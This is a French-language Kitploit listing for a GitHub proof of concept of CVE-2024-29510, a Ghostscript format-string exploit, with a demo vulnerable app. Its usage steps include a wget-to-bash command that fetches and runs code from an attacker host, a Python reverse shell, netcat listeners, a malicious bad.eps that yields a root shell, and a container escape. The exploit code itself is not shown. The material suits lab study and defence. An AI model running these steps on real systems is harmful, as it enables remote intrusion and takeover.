Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-29510 — POC code for CVE-2024-29510 and demo VulnApp | Kitploit
Outils/GitHubGitHub/swsmith2391/cve-2024-29510
Vulnerability AnalysisExploitationWeb Application ExploitationPayload DevelopmentContainer EscapeBinary Exploitation
GitHubswsmith2391/cve-2024-29510

CVE-2024-29510

POC code for CVE-2024-29510 and demo VulnApp

Voir le dépôt
11il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Recherche originale et code POC : https://codeanlabs.com/blog/research/cve-2024-29510-ghostscript-format-string-exploitation/

NOTE : Je n'ai apporté aucune modification au POC en dehors de la commande exécutée. Tout le crédit revient à Thomas Rinsma @ Codean Labs pour leur incroyable recherche et POC.

Scénario Local

  1. Enveloppé dans un script stager pour télécharger et exécuter un script de vérification afin de voir si l'hôte est vulnérable
  2. POC modifié pour télécharger et exécuter un reverse shell Python3
  3. Stager et reverse shell téléchargés et exécutés via STDIN
  4. Le POC laisse un artefact dans /tmp avec un nom aléatoire

Sur la machine de l'attaquant :

  1. Utilisez pwncat-cs ou netcat pour créer un écouteur sur le port 443
  2. Naviguez vers le répertoire de l'exploit
  3. python3 -m http.server 80

Sur la machine victime (Ubuntu 23.10 exécutant Ghostscript 10.01.2) :

  1. Ouvrez un terminal et exécutez : export RHOST=''; wget -q http://$RHOST/run -O - | bash &

Scénario Distant (VulnApp)

  1. Construisez VulnApp en utilisant : 'docker build -t cve-2024-29510-demo:latest .' (Nécessite une copie de https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs10021/ghostscript-10.02.1.tar.gz dans le répertoire Dockerfile)
  2. Exécutez VulnApp en utilisant : 'docker run --rm -p 5000:5000 cve-2024-29510-demo:latest'
  3. Essayez de convertir good.ps pour tester la fonctionnalité. Cela devrait retourner un PDF rendu avec des lignes dessinant une flèche, par ex. '>'
  4. Configurez un serveur web sur le port 80 hébergeant shell.html par ex. 'python3 -m http.server 80'
  5. Utilisez pwncat-cs ou netcat pour créer un écouteur sur le port 443
  6. Téléchargez bad.eps, VulnApp se bloquera et l'écouteur devrait attraper un reverse shell pour le conteneur (exécuté en tant que root)
  7. Échappez du conteneur !
Télécharger l’outil